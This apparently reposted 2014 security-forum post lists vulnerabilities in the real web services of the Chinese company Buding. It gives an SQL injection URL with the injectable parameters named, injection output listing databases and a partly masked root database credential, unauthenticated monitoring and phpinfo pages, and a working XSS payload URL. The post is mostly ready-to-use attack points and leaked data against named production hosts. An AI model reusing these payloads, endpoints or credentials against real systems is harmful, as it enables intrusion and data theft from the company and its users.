Buding vulnerabilities, including SQL injection (download)

Source: 黑吧安全网 (Heiba Security) | Views: 918 | Date: 2014-05-22

Buding Waimai (food delivery) SQL injection

http://waimai.2000tuan.com/waimai/view/get_waimai_by_shopid_and_typeid.php?shop_id=1&page=-1&city_id=31&type_id=4

The type_id and shop_id parameters are injectable.

Host IP: 58.**.**6.23

Web Server: nginx/0.8.54

Powered-by: PHP/5.1.6

DB Server: MySQL

Resp. Time(avg): 143 ms

Databases: information_schema

b*****vice

c***ns

h***ay

int***ft

k*v

mysql

test

w***i

Current User: ****@localhost

SQL version: 5.0.77-log

System User: ****@localhost

Host Name: c2.buding.cn

Installation dir: /usr/

Database username & password: root:0a9****2ca

Server performance monitoring system: unauthenticated access

http://monitor206.shequan.com/

Buding phpinfo exposure

http://log.2000tuan.com/app_log/index.php

http://waimai.2000tuan.com/index.php

http://log.2000tuan.com/index.php

http://shequan.com/info.php

======================================

Buding movie tickets XSS

http://jifenmovie.buding.cn/integral/msg.php?back_exit=true&itarget=reload&msg=%3Cscript%3Ealert('XSS')%3C/script%3E

======================================

Buding information disclosure

http://bz.shequan.com/test.php